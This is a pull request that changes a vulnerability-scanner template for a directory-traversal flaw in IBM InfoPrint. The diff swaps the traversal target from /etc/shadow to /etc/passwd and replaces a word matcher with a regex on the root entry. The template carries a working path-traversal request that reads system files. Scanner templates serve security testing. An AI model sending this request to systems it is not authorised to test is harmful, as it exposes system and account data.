### PR TITLE
Replace /etc/shadow by /etc/passwd

### DIFF
--- a/vulnerabilities/ibm-infoprint-directory-traversal.yaml
+++ b/vulnerabilities/ibm-infoprint-directory-traversal.yaml
@@ -10,7 +10,7 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/./../../../../../../../../../../etc/shadow'
+      - '{{BaseURL}}/./../../../../../../../../../../etc/passwd'
 
     matchers-condition: and
     matchers:

--- a/vulnerabilities/ibm-infoprint-directory-traversal.yaml
+++ b/vulnerabilities/ibm-infoprint-directory-traversal.yaml
@@ -11,7 +11,6 @@ requests:
   - method: GET
     path:
       - '{{BaseURL}}/./../../../../../../../../../../etc/passwd'
-
     matchers-condition: and
     matchers:
       - type: status

--- a/vulnerabilities/ibm-infoprint-directory-traversal.yaml
+++ b/vulnerabilities/ibm-infoprint-directory-traversal.yaml
@@ -17,6 +17,8 @@ requests:
       - type: status
         status:
           - 200
-      - type: word
-        words:
-          - "root:::"
+      - type: regex
+        regex:
+         - "root:[x*]:0:0"
+        part: body
+

--- a/vulnerabilities/ibm-infoprint-directory-traversal.yaml
+++ b/vulnerabilities/ibm-infoprint-directory-traversal.yaml
@@ -20,4 +20,3 @@ requests:
         regex:
           - "root:[x*]:0:0"
         part: body
-

--- a/vulnerabilities/ibm-infoprint-directory-traversal.yaml
+++ b/vulnerabilities/ibm-infoprint-directory-traversal.yaml
@@ -19,6 +19,6 @@ requests:
           - 200
       - type: regex
         regex:
-         - "root:[x*]:0:0"
+          - "root:[x*]:0:0"
         part: body
 


### PR DESCRIPTION
Permissions for shadow are much stricter. passwd is globally readable and should be preferred to test path traversal.